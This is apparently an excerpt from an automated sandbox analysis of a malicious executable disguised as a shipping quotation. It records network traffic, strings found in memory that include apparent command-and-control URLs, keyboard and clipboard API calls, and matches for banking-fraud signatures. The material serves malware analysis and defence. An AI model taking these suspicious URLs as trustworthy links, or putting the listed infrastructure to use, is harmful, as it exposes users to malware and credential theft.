              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:48:14 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 
73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:48:17 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:48:19 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html; charset=utf-8Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:48:35 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:48:38 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:48:41 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 15:49:05 GMTserver: LiteSpeed
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 15:49:08 GMTserver: LiteSpeed
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 15:49:11 GMTserver: LiteSpeed
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 15:49:14 GMTserver: LiteSpeed
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:50:39 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YLueVAdh4mizLzPAFxBT5pY2ssW1VIRipybrEwS3KbMuzsL0rMcio9kLSdR0zZZ6dDJqEkQM9%2BUn8SG3zWxrtgb7uauMp3IM08CIPKkzQnBduXHQxsgvG3vsLyIMFdIq%2Bl8FCD0L1A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff5958f1c0ff865-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=118739&min_rtt=118739&rtt_var=59369&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=807&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:50:42 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ctFN4TaJT%2B0gJxpkFJebArmioPfFs2kHe842w64H%2FYlPqDB3UplOHDxdGyq%2B1DrDhV9YDYEmtIdJI29EP51XDNFjRx25%2FbcSJLsir89tZq7Ql%2Fg6bq%2BjIqWFBG%2FVEYS4xQjm3AGnPw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff5959faff5eaf7-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=128251&min_rtt=128251&rtt_var=64125&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=827&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:50:44 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TOoijhS9hbpWsqe90%2B6jaKysCqjmz%2BitwTks8LZlLEQ1CvB5ivpkjRt1a5wnblPHuE9j6InGQnBnCr8lzn06CAlR95WAOJRuKK7y%2BzCOeoReFWI2vjN3JzkMhi6D%2FBlkwOqbyCz0Tg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff595b0392e10b4-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=119085&min_rtt=119085&rtt_var=59542&sent=6&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7976&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:50:47 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6AVP%2F7HpE%2FW7Waeocc%2BFhfvYe%2BtIc8MzgSKH2Pf%2BWoBEWMtfqofeYBHRfDLljOxa%2B%2Bb5%2B5vLyB0sQqYkAF7jEEdSdYdTsvYORwEY0REsPeDDM1YKk7IZULT4PZ6AosEzQ3DCb3B8Zw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff595c0df92f865-ORDalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=118684&min_rtt=118684&rtt_var=59342&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=534&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:51:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZFs509HqJLvYm79m0vnQyDfLxdTKEfFPP7GSWI5E84fJWyTIVVqEIrhmvbsXom%2BSIpmeBwddYXJmEvuXmDeymdw6IE%2BXBhz70heOb4uN9r4zxw1rWhkFk89r1sEnEEkFCXi1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff596a0eb3b6075-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=118631&min_rtt=118631&rtt_var=59315&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=795&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:51:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9YxU0im9%2FgKYglvQzQ1aOytbTHnz8wo03tiSNRr36MRNGZBmLWf9FN2XmJNA585Z1i5FGqtxPgLf8uQY0%2B62nNLGqrwMyk9BWSimeERlNSiyc5fFgz7%2BwHTZu0zvO0gbnBTW"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff596b18b08e81e-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=119801&min_rtt=119801&rtt_var=59900&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=815&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:51:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ovUOGJDxekgVVdv1hCWr6tjnLgQ3gIe0GGP1WftOKUhkcL6%2FgN5ncrva2n%2BbHRU3LySEvHDHejL72YkN%2F3UdOrXv1gvUauUxw1Z3HNORiIWlvtrjYk7lOOUwXNxcJq8xauNV"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff596c21e47114d-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=118941&min_rtt=118941&rtt_var=59470&sent=5&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7964&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:51:31 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w7dablU66gtaVq1nZcSaPvOgLeiTvvD0R2PcQ0X0dn7n6ftEh0VnU6%2F1BKg%2FPntAXkFOprO3O5cpH3zHDvDA%2F8GFpAGY4uqGnuIt32uDXJk6yQiN%2F5vJP9Eh1FxXd2sLK%2BEp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff596d2ac92114d-ORDalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=118780&min_rtt=118780&rtt_var=59390&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=530&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:51:36 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:51:39 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:51:42 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:51:44 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html; charset=utf-8
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:51:59 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:52:02 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:52:04 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 15:52:29 GMTserver: LiteSpeed
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 15:52:32 GMTserver: LiteSpeed
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 15:52:35 GMTserver: LiteSpeed
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 15:52:38 GMTserver: LiteSpeed
              Source: cmdkey.exe, 00000003.00000002.15247546664.00000000050E8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://maximumgroup.co.za/cxj4/?lV=gKtC9mpNHTkTr00OOrlul8C1Q
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000007C0A000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.000000000527A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://push.zhanzhang.baidu.com/push.js
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000006C56000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.00000000042C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.chiro.live/jwa9?gp=1&js=1&uuid=1736437877.0005169428&other_args=eyJ1cmkiOiAiL2p3YTkiLCAiY
              Source: RAVCpl64.exe, 00000002.00000002.16205103694.000000000349E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ogbos88.cyou
              Source: RAVCpl64.exe, 00000002.00000002.16205103694.000000000349E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ogbos88.cyou/kj1o/
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000007C0A000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.000000000527A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.zbywl.com/js.js
              Source: cmdkey.exe, 00000003.00000002.15247546664.00000000042C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www70.chiro.live/
              Source: cmdkey.exe, 00000003.00000003.11918930615.0000000008077000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: cmdkey.exe, 00000003.00000003.11918930615.0000000008077000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: b427-I_1.3.drString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: cmdkey.exe, 00000003.00000003.11922384899.00000000080E9000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11918930615.0000000008077000.00000004.00000020.00020000.00000000.sdmp, b427-I_1.3.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: b427-I_1.3.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000006F7A000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.00000000045EA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
              Source: cmdkey.exe, 00000003.00000003.11918930615.0000000008077000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
              Source: cmdkey.exe, 00000003.00000003.11916406824.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15244350653.00000000031D9000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11911162884.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11916406824.00000000031CD000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15244350653.00000000031C3000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11911162884.00000000031CF000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15244350653.00000000031F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
              Source: cmdkey.exe, 00000003.00000003.11916406824.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15244350653.00000000031D9000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11911162884.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15244350653.00000000031F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
              Source: cmdkey.exe, 00000003.00000002.15244350653.00000000031D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
              Source: cmdkey.exe, 00000003.00000003.11916406824.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15244350653.00000000031D9000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11911162884.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15244350653.00000000031F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
              Source: cmdkey.exe, 00000003.00000002.15244350653.000000000318D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
              Source: cmdkey.exe, 00000003.00000002.15244350653.000000000318D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
              Source: cmdkey.exe, 00000003.00000003.11910170497.000000000805F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000007754000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004DC4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://ogbos88vip.click
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006AEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_006AEAFF
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006AED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_006AED6A
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0069AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0069AA57
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006C9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_006C9576

              E-Banking Fraud

              Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.15246117394.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.15246023580.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.11733519795.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.11735115611.00000000038A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              System Summary

              Source: QUOTATION#070125-ELITE MARINE .exeString found in binary or memory: This is a third-party compiled AutoIt script.
              Source: QUOTATION#070125-ELITE MARINE .exe, 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_30f9ef9f-d
              Source: initial sampleStatic PE information: Filename: QUOTATION#070125-ELITE MARINE .exe
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042CA33 NtClose,1_2_0042CA33
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972B90 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03972B90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972BC0 NtQueryInformationToken,LdrInitializeThunk,1_2_03972BC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972A80 NtClose,LdrInitializeThunk,1_2_03972A80
